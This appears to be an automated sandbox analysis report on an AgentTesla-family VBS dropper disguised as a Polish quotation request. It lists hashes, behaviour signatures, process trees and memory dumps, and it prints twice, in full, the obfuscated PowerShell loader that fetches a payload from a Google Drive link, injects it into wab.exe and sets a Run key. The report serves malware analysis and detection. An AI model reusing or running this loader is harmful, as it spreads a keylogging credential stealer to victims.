Overview

overview

10

Static

static

1

Zapytanie ...N).vbs

windows7-x64

10

Zapytanie ...N).vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    24-04-2024 04:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Zapytanie ofertowe (7427-23 ROCKFIN).vbs

  • Size

    7KB

  • MD5

    3a6ac16d9bc107b14e4caa9b7ad08756

  • SHA1

    d6c6f6d4843ef83e2c4e3344060aca80b032eb43

  • SHA256

    02b7361eeb75b842d6b7ade09f042879d501e50bc07a8d4edcfc04b7d728b0e7

  • SHA512

    e0003c51e42c3ac764c6114692b1ee155c424e046cd3ba6f3a151bfb58eaccbc347f1cc0e9d3f0c90a6e350047056c38f79926fc716cab84b735533d64dd41ba

  • SSDEEP

    96:+AwU3ey01WrZ9NnWh04lLchxcxaBKXaxcKicGeOuBhsempL92U9xsSwFABSCpu4P:+nWeRsrZXHOgpc3TfsjAQHBUBD

Score
10/10
agentteslakeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Zapytanie ofertowe (7427-23 ROCKFIN).vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2868
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Frihandelszonenterweaved = 1;$Adempted='Substrin';$Adempted+='g';Function Omitted($Struts){$Flgerigtigt=$Struts.Length-$Frihandelszonenterweaved;For($Frihandelszone=5; $Frihandelszone -lt $Flgerigtigt; $Frihandelszone+=(6)){$Uopfordredes+=$Struts.$Adempted.Invoke($Frihandelszone, $Frihandelszonenterweaved);}$Uopfordredes;}function Medeas($Brevbakkernes){& ($Kradsende) ($Brevbakkernes);}$Rkereaktionr=Omitted 'ReageM ,ydro F.ebzFlaskiEnvayl Op,alDynapaUforh/Ko,fu5Klebr.,thic0Trygh Prog(InterWNonphipharmn Ar.hdAfmysoO.driwErgomsUdspr Afh,tN LderTRetou outga1U.nke0Paast.Sulf 0Battl;Danse signaWTveb iRkkefn Endo6 Adst4Skalp; Bjni PukixSu mo6Horni4Lyric;.vile skywir M,rsvJon s:J,min1Unapp2,loat1Lango.blget0Aa,de)Vater WillGMiso eApopecVidtskAmme,oArbej/Humir2 .yrt0Gasse1 aren0Skold0Norma1,remi0Goi r1Imagi CeleFHaandiDesinr Udske NeodfTermooKoblex.ompe/Anbr,1Warpa2 alvf1Opsp.. ,iru0bitub ';$Toer=Omitted 'for,sUWolf,sUdflyeTransrIndda- ndeAContegSiperePreflnB initForha ';$Dragboat=Omitted 'St.nohOffpstactintResmopCobitsDeaco:homic/tubbe/Cl,nkdSlimerSekreiA,alov.srumeTegni.DarwigPhr noPartioicemagRets,lFurcaeTapp .Po.occcobleo B,flm ten/Sk.gguflaglcLacew?R.pete.igtbxArbejpFuireoVe.mir,mygdtNonco=Guds.dRevisoAntikwMusicnBo,tilLimb,oC,ntraDomstdSecun&PerikiClaspdMelan=Sensa1,rishMBaromu AktiXArbejp,teff8VagthZPla.ho,tentYRu,yfjPanteBMerceu.econC AutoPPos.r2MaundX Sig.GR,roy8StenlQInarcMreprsYFootsEErhvejDy ena simuTA,sorFSlumpDHolopb wletnPrimoWBisamlToillQ TragRdialy ';$Boltsakse=Omitted 'Manch>Predi ';$Kradsende=Omitted 'Drbybi V,ste.ebrdxSirli ';$Ectognatha='vanddraabernes';Medeas (Omitted 'UnlugSCheckeForsvtBolst-Glo.hCRatiooAabenn Kin,tSheete TrannFolketUdryd Moun -CitriPPancraafflitAnnekhSerpu CatfTK.mmu:Milli\ConfeSEmbryePericmDupliiOver vResunaF.rbrlFeltmvhand aR.ndetP,esseOrdne. NonctTvingx Avart Foss G nza-ProbaVSteataDispel OrthuFjel,eNaade .urmu$FyrfaEMne,ocMinictHyp.roknoldgAmilon.terea Aarst.tdlihRespoaSolbr; Udkr ');Medeas (Omitted 'Photoi.roctfFuldb Staur(Bragut Hyb e UigesFreaktPos,n- KrftpRenskaPolystForlah Tabe AcephTOf ic:,apgr\SyrinSLderseS.atumpassii Sendv mo.naHjulelPle,mvValvuaMaltrtMorepeTykho. SenttsidevxUnblotDenot)Bogbi{Brostepre lxKitt iF.rentJo da} amme;Burel ');$Proviantens = Omitted ' Ru,ke OrdecSam lhStangoT ken Trans% sera SpeepTeaktpStrutd.rykfa bog,tDodsna.euch% Farc\FjernPVir,llSociaaP.ngyiUmrken.avlvb Komma ejlec S.lbk c.ic. indgMErotei.ngensnewfo Ratih&Phyto&Di ss Cruste ImmecFarr hVinduoHelio Bara$ Ch,e ';Medeas (Omitted 'Lirke$ FordgAdvenlsa coocrotab,empeatorqulIngra:Her,cBBefriaF,ppenSneezkTunghbPolemeSki.ssExudatOb.klyMicrorPotpoeKriser.mudsefresknFr lasamorb=Angre(WindscAntiam AmphdGrans fhug/StillcMat,i Plagi$Alt aP DyskrB,itcoRecusvVaporiTelfeaOpsprnEma,ctO,tfleEskimnsnusds Katm) unde ');Medeas (Omitted 'Beska$glasvgKnipllSamaro SphebSpr,gaYeplylTrans: cemGFo.dahSkrdda UmbrnSe,ite,rinosVga,ietrster ,pece resi=Silkn$ aragD Sp,lrintr.aMai pg Tusib Huc.o FlamaSubmotS.irk.SikrisDgninpFamillDataoiSa.dytMoner(Socia$FormuBSkih,oBorghlO gavt Cy.lsSkifta KongkPechisTospaeTurko) Prel ');$Dragboat=$Ghanesere[0];Medeas (Omitted 'Komme$,ipargGranglB.lysoDanseb Dinga MennlSamt :C,ntrM RoadaHovedrMartrrmart o Hydrw,jaseiMarissBekymh Wons=AuxofNChriseLeuciwIzako-BlindOPrivibL.rikjLi,ere Jew cTaks,tmodta Rei,oSsnligyL.cersIdrtstDrejeeMa kgmBrevv.Sil eNe broeNormbtcalc .SpdbaWTaleneRekvibBlac,CJuvell UnmyiSekreeWr ngnUnlivtU der ');Medeas (Omitted 'Uford$sedatM EpilaPrimarNook rSulfooLyvesw ,ardi EntesJtterh.nter.SynonHGieaweUndera AfgudCytobeD ceirOverrsAshke[ Defe$HldenTGarl,oAal ceKunderRangs]Derhj=Creol$PrecoRBomsekNon neStvnerRyk,eeSubdeaV.ksekBenz,tH,mbliTheomoChr,snMeni.rPsitt ');$Scripteres=Omitted 'TebreMTugtea DykkrUnpalr kyggoStilkwRecepiUsurps ChilhTesta.MenosDCountoSk rpwVintrnOoplalDetunoB kkeaDrilldOptrnFKrucii PharlAcrobe.nsla(Canne$ pareDpregrrComb.aSoc,agAdenobDefecoR ndsaHes etOogon,Ac,ep$S.garF Javeo Mar,r FjumpReporo ske,sDiapatJessifAlie.gUndemtInstrnF,rtbiSac,hneksisgStere)Genls ';$Scripteres=$Bankbestyrerens[1]+$Scripteres;$Forpostfgtning=$Bankbestyrerens[0];Medeas (Omitted 'Ekspl$Perchg FladlT,traobrudlbGrnseadeporl gers: BoedDVa.iteUn.ronKremtgmili.uUnsleeLega =Ove,s(OmvltTA,ndleCoxndsXyl ltBaath-s.ungP S otaKonvet ,ookhzoonp Vadef$jeanaFbanjooRefigr ChripBlokao hushsOverptA etrfBadeagSauc.tBlirtnSemidiTils nHidrrgen ol)Shedd ');while (!$Dengue) {Medeas (Omitted ' Dev $nonprg.lgoml,lesvoPeripbMill.aLovp,lPanth:,luotPRaideeFerretForst8salgs7.tabl= Comp$StenetShantrSp,cuuPoodseIngen ') ;Medeas $Scripteres;Medeas (Omitted 'SmugtSUnde,tTeol aGa,ferToneft Arm -UfornS BesklVmin eGrande Ob lp Recy Ex.ra4Disli ');Medeas (Omitted ' Skum$So.utg Trialomlsno Af ab Packako.palRefoc:overfD mtaae eindnSlavegVersiu,elyseRubat=cirku(Stam TPli teAltersDarrftpinyo- StowPUncroaAutistAd.pthAftry Telec$PiertF HeltoKr,str Tel,pA quioGaransTenentMicr f Ko.tgOrga tVask nSimpli Ul.an T.mbg All,) Anti ') ;Medeas (Omitted 'Ingre$ kalpgBrddelCushtoMofusbNoncoaConcil Pind:massaBtryksrRevalyallegnU,washAfleviHighbl uffidBullisGarig= co,v$UlcergUnivelGo,vio He.sbStatiaTradilPolit:Drag.HKorrei Fre,jStal.aSnobbcUnverk skemiNys.antidssgSlmni+Nonci+Cit a%Preno$AnticG KollhKissiaSunbunbrsmge Pas,s MisqeUrethrSaltkeReact.Unde.cMentoo CerouEnhornFidibt dagv ') ;$Dragboat=$Ghanesere[$Brynhilds];}Medeas (Omitted ' Last$ SkivgIncitlHydrooReserbRinglaMeddelCirku: photU H stnEcbalt af ro,idstl.ktteeResenrkandeaPer,otRel,teH,nkedHunte start= Ede, fd elGWorkseRece tBegi -Re.igCHjemmoDisopnOpblstGrippeAmbivn LavttLejeb Inhal$M,ssoFSkinnoPaa.erUnknopProtooSk des,ndertUnderf.yplagSqu.stDesmanBilleiTagvrnBif.og layl ');Medeas (Omitted 'Br,ve$Mar.agForhelS.aseoBloodb Plataemu,gl Inte:ElopeRAnticeJ msecgaloco MudsmChronmMlecheXera.nEvacud Sm.teModulrRumme Hillm=Drkar .udst[ ReseSFa ilyC,ryosDiplotSpadaeTottemNanop.BrombC LubroUnhidnFr,mbvNyctaeKontrrMang tDa,fi]Kvant:Relat:Moru F Wicor Paako Nedbm,izovBHol taIntegsBasuneRu ga6Batto4TetteSFora tChuckrB,foriGerranSat,lg rait( Fakt$AedilUHol sn SteptTeernoStiftl.tilieStjkir P nda Raptt Ji be,ickod Lakr)Rudac ');Medeas (Omitted 'Tilfo$Thin,g F sll Dk.ioFifl,bHimmeaHardsl rap:De,auTApprohFestfeDagt,r suk,mSkorpoBrasedDrosoySvanenTo.lba MimomInspi Aasyn=Linke Alec[FastaSGrindyPau us,rnsjt L,tueamortmManch.FinopT Stude illgx K artMusc,.RecepEPreshnesbjecCoinsoFagi d AsciiDors n For.gOblig] Vl.d:,dbls:UnwivA KrymS Trs.COverlISkifeI Arvi.Anti,GCameleNonprt glumS Ud,atHjemlrFo.eqiNomadnDromegT.adi(I,tra$ BudgRAnt.peMutuac,uyedoHasarmChalcmJussieD.mesnSoupedY urieB enbrNikke)d.ask ');Medeas (Omitted 'Emana$Saltpg.nderl,ksofo V lgbEerieaOssiflSnigv:LemmyDnedskeCilictUnmane RevarEsca,i .inno Hud.rWendiaMuny tWorshi Fig.n Ildhg Cock= Spec$ Dod,T Bo dh T.cieBrugerM.ffvmBl mmoMappid T peyBi ifnArmera Ma,umContr.UndersR minuC.stob Eggws Matet Gu.srSiegeiMi sinbeh ggTidsk(Under3A,ase2Ylaha0P.stm1Slap 1U dst9Non.y,Huswi2F.rvr8U,adu1Marsu6,lbet1Nonco)Slu.s ');Medeas $Deteriorating;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1624
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Plainback.Mis && echo $"
        3⤵
          PID:2620
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Frihandelszonenterweaved = 1;$Adempted='Substrin';$Adempted+='g';Function Omitted($Struts){$Flgerigtigt=$Struts.Length-$Frihandelszonenterweaved;For($Frihandelszone=5; $Frihandelszone -lt $Flgerigtigt; $Frihandelszone+=(6)){$Uopfordredes+=$Struts.$Adempted.Invoke($Frihandelszone, $Frihandelszonenterweaved);}$Uopfordredes;}function Medeas($Brevbakkernes){& ($Kradsende) ($Brevbakkernes);}$Rkereaktionr=Omitted 'ReageM ,ydro F.ebzFlaskiEnvayl Op,alDynapaUforh/Ko,fu5Klebr.,thic0Trygh Prog(InterWNonphipharmn Ar.hdAfmysoO.driwErgomsUdspr Afh,tN LderTRetou outga1U.nke0Paast.Sulf 0Battl;Danse signaWTveb iRkkefn Endo6 Adst4Skalp; Bjni PukixSu mo6Horni4Lyric;.vile skywir M,rsvJon s:J,min1Unapp2,loat1Lango.blget0Aa,de)Vater WillGMiso eApopecVidtskAmme,oArbej/Humir2 .yrt0Gasse1 aren0Skold0Norma1,remi0Goi r1Imagi CeleFHaandiDesinr Udske NeodfTermooKoblex.ompe/Anbr,1Warpa2 alvf1Opsp.. ,iru0bitub ';$Toer=Omitted 'for,sUWolf,sUdflyeTransrIndda- ndeAContegSiperePreflnB initForha ';$Dragboat=Omitted 'St.nohOffpstactintResmopCobitsDeaco:homic/tubbe/Cl,nkdSlimerSekreiA,alov.srumeTegni.DarwigPhr noPartioicemagRets,lFurcaeTapp .Po.occcobleo B,flm ten/Sk.gguflaglcLacew?R.pete.igtbxArbejpFuireoVe.mir,mygdtNonco=Guds.dRevisoAntikwMusicnBo,tilLimb,oC,ntraDomstdSecun&PerikiClaspdMelan=Sensa1,rishMBaromu AktiXArbejp,teff8VagthZPla.ho,tentYRu,yfjPanteBMerceu.econC AutoPPos.r2MaundX Sig.GR,roy8StenlQInarcMreprsYFootsEErhvejDy ena simuTA,sorFSlumpDHolopb wletnPrimoWBisamlToillQ TragRdialy ';$Boltsakse=Omitted 'Manch>Predi ';$Kradsende=Omitted 'Drbybi V,ste.ebrdxSirli ';$Ectognatha='vanddraabernes';Medeas (Omitted 'UnlugSCheckeForsvtBolst-Glo.hCRatiooAabenn Kin,tSheete TrannFolketUdryd Moun -CitriPPancraafflitAnnekhSerpu CatfTK.mmu:Milli\ConfeSEmbryePericmDupliiOver vResunaF.rbrlFeltmvhand aR.ndetP,esseOrdne. NonctTvingx Avart Foss G nza-ProbaVSteataDispel OrthuFjel,eNaade .urmu$FyrfaEMne,ocMinictHyp.roknoldgAmilon.terea Aarst.tdlihRespoaSolbr; Udkr ');Medeas (Omitted 'Photoi.roctfFuldb Staur(Bragut Hyb e UigesFreaktPos,n- KrftpRenskaPolystForlah Tabe AcephTOf ic:,apgr\SyrinSLderseS.atumpassii Sendv mo.naHjulelPle,mvValvuaMaltrtMorepeTykho. SenttsidevxUnblotDenot)Bogbi{Brostepre lxKitt iF.rentJo da} amme;Burel ');$Proviantens = Omitted ' Ru,ke OrdecSam lhStangoT ken Trans% sera SpeepTeaktpStrutd.rykfa bog,tDodsna.euch% Farc\FjernPVir,llSociaaP.ngyiUmrken.avlvb Komma ejlec S.lbk c.ic. indgMErotei.ngensnewfo Ratih&Phyto&Di ss Cruste ImmecFarr hVinduoHelio Bara$ Ch,e ';Medeas (Omitted 'Lirke$ FordgAdvenlsa coocrotab,empeatorqulIngra:Her,cBBefriaF,ppenSneezkTunghbPolemeSki.ssExudatOb.klyMicrorPotpoeKriser.mudsefresknFr lasamorb=Angre(WindscAntiam AmphdGrans fhug/StillcMat,i Plagi$Alt aP DyskrB,itcoRecusvVaporiTelfeaOpsprnEma,ctO,tfleEskimnsnusds Katm) unde ');Medeas (Omitted 'Beska$glasvgKnipllSamaro SphebSpr,gaYeplylTrans: cemGFo.dahSkrdda UmbrnSe,ite,rinosVga,ietrster ,pece resi=Silkn$ aragD Sp,lrintr.aMai pg Tusib Huc.o FlamaSubmotS.irk.SikrisDgninpFamillDataoiSa.dytMoner(Socia$FormuBSkih,oBorghlO gavt Cy.lsSkifta KongkPechisTospaeTurko) Prel ');$Dragboat=$Ghanesere[0];Medeas (Omitted 'Komme$,ipargGranglB.lysoDanseb Dinga MennlSamt :C,ntrM RoadaHovedrMartrrmart o Hydrw,jaseiMarissBekymh Wons=AuxofNChriseLeuciwIzako-BlindOPrivibL.rikjLi,ere Jew cTaks,tmodta Rei,oSsnligyL.cersIdrtstDrejeeMa kgmBrevv.Sil eNe broeNormbtcalc .SpdbaWTaleneRekvibBlac,CJuvell UnmyiSekreeWr ngnUnlivtU der ');Medeas (Omitted 'Uford$sedatM EpilaPrimarNook rSulfooLyvesw ,ardi EntesJtterh.nter.SynonHGieaweUndera AfgudCytobeD ceirOverrsAshke[ Defe$HldenTGarl,oAal ceKunderRangs]Derhj=Creol$PrecoRBomsekNon neStvnerRyk,eeSubdeaV.ksekBenz,tH,mbliTheomoChr,snMeni.rPsitt ');$Scripteres=Omitted 'TebreMTugtea DykkrUnpalr kyggoStilkwRecepiUsurps ChilhTesta.MenosDCountoSk rpwVintrnOoplalDetunoB kkeaDrilldOptrnFKrucii PharlAcrobe.nsla(Canne$ pareDpregrrComb.aSoc,agAdenobDefecoR ndsaHes etOogon,Ac,ep$S.garF Javeo Mar,r FjumpReporo ske,sDiapatJessifAlie.gUndemtInstrnF,rtbiSac,hneksisgStere)Genls ';$Scripteres=$Bankbestyrerens[1]+$Scripteres;$Forpostfgtning=$Bankbestyrerens[0];Medeas (Omitted 'Ekspl$Perchg FladlT,traobrudlbGrnseadeporl gers: BoedDVa.iteUn.ronKremtgmili.uUnsleeLega =Ove,s(OmvltTA,ndleCoxndsXyl ltBaath-s.ungP S otaKonvet ,ookhzoonp Vadef$jeanaFbanjooRefigr ChripBlokao hushsOverptA etrfBadeagSauc.tBlirtnSemidiTils nHidrrgen ol)Shedd ');while (!$Dengue) {Medeas (Omitted ' Dev $nonprg.lgoml,lesvoPeripbMill.aLovp,lPanth:,luotPRaideeFerretForst8salgs7.tabl= Comp$StenetShantrSp,cuuPoodseIngen ') ;Medeas $Scripteres;Medeas (Omitted 'SmugtSUnde,tTeol aGa,ferToneft Arm -UfornS BesklVmin eGrande Ob lp Recy Ex.ra4Disli ');Medeas (Omitted ' Skum$So.utg Trialomlsno Af ab Packako.palRefoc:overfD mtaae eindnSlavegVersiu,elyseRubat=cirku(Stam TPli teAltersDarrftpinyo- StowPUncroaAutistAd.pthAftry Telec$PiertF HeltoKr,str Tel,pA quioGaransTenentMicr f Ko.tgOrga tVask nSimpli Ul.an T.mbg All,) Anti ') ;Medeas (Omitted 'Ingre$ kalpgBrddelCushtoMofusbNoncoaConcil Pind:massaBtryksrRevalyallegnU,washAfleviHighbl uffidBullisGarig= co,v$UlcergUnivelGo,vio He.sbStatiaTradilPolit:Drag.HKorrei Fre,jStal.aSnobbcUnverk skemiNys.antidssgSlmni+Nonci+Cit a%Preno$AnticG KollhKissiaSunbunbrsmge Pas,s MisqeUrethrSaltkeReact.Unde.cMentoo CerouEnhornFidibt dagv ') ;$Dragboat=$Ghanesere[$Brynhilds];}Medeas (Omitted ' Last$ SkivgIncitlHydrooReserbRinglaMeddelCirku: photU H stnEcbalt af ro,idstl.ktteeResenrkandeaPer,otRel,teH,nkedHunte start= Ede, fd elGWorkseRece tBegi -Re.igCHjemmoDisopnOpblstGrippeAmbivn LavttLejeb Inhal$M,ssoFSkinnoPaa.erUnknopProtooSk des,ndertUnderf.yplagSqu.stDesmanBilleiTagvrnBif.og layl ');Medeas (Omitted 'Br,ve$Mar.agForhelS.aseoBloodb Plataemu,gl Inte:ElopeRAnticeJ msecgaloco MudsmChronmMlecheXera.nEvacud Sm.teModulrRumme Hillm=Drkar .udst[ ReseSFa ilyC,ryosDiplotSpadaeTottemNanop.BrombC LubroUnhidnFr,mbvNyctaeKontrrMang tDa,fi]Kvant:Relat:Moru F Wicor Paako Nedbm,izovBHol taIntegsBasuneRu ga6Batto4TetteSFora tChuckrB,foriGerranSat,lg rait( Fakt$AedilUHol sn SteptTeernoStiftl.tilieStjkir P nda Raptt Ji be,ickod Lakr)Rudac ');Medeas (Omitted 'Tilfo$Thin,g F sll Dk.ioFifl,bHimmeaHardsl rap:De,auTApprohFestfeDagt,r suk,mSkorpoBrasedDrosoySvanenTo.lba MimomInspi Aasyn=Linke Alec[FastaSGrindyPau us,rnsjt L,tueamortmManch.FinopT Stude illgx K artMusc,.RecepEPreshnesbjecCoinsoFagi d AsciiDors n For.gOblig] Vl.d:,dbls:UnwivA KrymS Trs.COverlISkifeI Arvi.Anti,GCameleNonprt glumS Ud,atHjemlrFo.eqiNomadnDromegT.adi(I,tra$ BudgRAnt.peMutuac,uyedoHasarmChalcmJussieD.mesnSoupedY urieB enbrNikke)d.ask ');Medeas (Omitted 'Emana$Saltpg.nderl,ksofo V lgbEerieaOssiflSnigv:LemmyDnedskeCilictUnmane RevarEsca,i .inno Hud.rWendiaMuny tWorshi Fig.n Ildhg Cock= Spec$ Dod,T Bo dh T.cieBrugerM.ffvmBl mmoMappid T peyBi ifnArmera Ma,umContr.UndersR minuC.stob Eggws Matet Gu.srSiegeiMi sinbeh ggTidsk(Under3A,ase2Ylaha0P.stm1Slap 1U dst9Non.y,Huswi2F.rvr8U,adu1Marsu6,lbet1Nonco)Slu.s ');Medeas $Deteriorating;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2928
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Plainback.Mis && echo $"
            4⤵
              PID:2412
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2672

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ULNKBNDBROS0QIQJLU4L.temp
        Filesize

        7KB

        MD5

        0fadab2136e0afd824ad1fc150d05dab

        SHA1

        dbeb974d4e64278ee1fb17668eb7d1fb57742a68

        SHA256

        0b4e8725300e9839f5b17daefc8edc2a6b48e28e4821e42312ae57d5169dcc37

        SHA512

        580044a504e24a3af1a947b47ac72729a25d5f944b910bae320382e7103c01629c498b0a9de724d35ed67ae39f04448ab4b99ec4e1ebcf4facfb6b1520baa562

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Plainback.Mis
        Filesize

        453KB

        MD5

        79d51e63cdac67160b04f7efab39c849

        SHA1

        d7deadf949f94af3f83b5b03ff941ced567dbb20

        SHA256

        824d31604aec39b84b4d634eef442dc264d46412de3ee2b35befaac615e451c4

        SHA512

        7b5ee831eb58f2c024f06fedc1a20311922d2442b6802c662b02559318ae8dfa510f3d73d2993b169a7edb066a5b353da325eb500c00743842a1bdd5c5770aa2

        Download Submit
      • memory/1624-10-0x0000000002D20000-0x0000000002DA0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1624-7-0x0000000001F50000-0x0000000001F58000-memory.dmp
        Filesize

        32KB

        Download
      • memory/1624-8-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1624-9-0x0000000002D20000-0x0000000002DA0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1624-21-0x0000000002D20000-0x0000000002DA0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1624-4-0x000000001B840000-0x000000001BB22000-memory.dmp
        Filesize

        2.9MB

        Download
      • memory/1624-58-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1624-5-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1624-26-0x0000000002D20000-0x0000000002DA0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1624-23-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp
        Filesize

        9.6MB

        Download
      • memory/1624-6-0x0000000002D20000-0x0000000002DA0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/1624-22-0x0000000002D20000-0x0000000002DA0000-memory.dmp
        Filesize

        512KB

        Download
      • memory/2672-32-0x0000000077410000-0x00000000775B9000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/2672-33-0x0000000077636000-0x0000000077637000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2672-65-0x000000006EED0000-0x000000006F5BE000-memory.dmp
        Filesize

        6.9MB

        Download
      • memory/2672-61-0x00000000250D0000-0x0000000025110000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2672-60-0x000000006EED0000-0x000000006F5BE000-memory.dmp
        Filesize

        6.9MB

        Download
      • memory/2672-59-0x00000000003B0000-0x00000000003F2000-memory.dmp
        Filesize

        264KB

        Download
      • memory/2672-56-0x00000000003B0000-0x0000000001412000-memory.dmp
        Filesize

        16.4MB

        Download
      • memory/2672-34-0x0000000077600000-0x00000000776D6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/2928-17-0x0000000073450000-0x00000000739FB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2928-30-0x0000000077600000-0x00000000776D6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/2928-16-0x00000000028B0000-0x00000000028F0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2928-29-0x00000000028B0000-0x00000000028F0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2928-28-0x0000000073450000-0x00000000739FB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2928-27-0x0000000077410000-0x00000000775B9000-memory.dmp
        Filesize

        1.7MB

        Download
      • memory/2928-15-0x0000000073450000-0x00000000739FB000-memory.dmp
        Filesize

        5.7MB

        Download
      • memory/2928-20-0x00000000028B0000-0x00000000028F0000-memory.dmp
        Filesize

        256KB

        Download
      • memory/2928-24-0x0000000006490000-0x000000000B74C000-memory.dmp
        Filesize

        82.7MB

        Download
      • memory/2928-25-0x0000000005560000-0x0000000005561000-memory.dmp
        Filesize

        4KB

        Download
      • memory/2928-18-0x00000000028B0000-0x00000000028F0000-memory.dmp
        Filesize

        256KB

        Download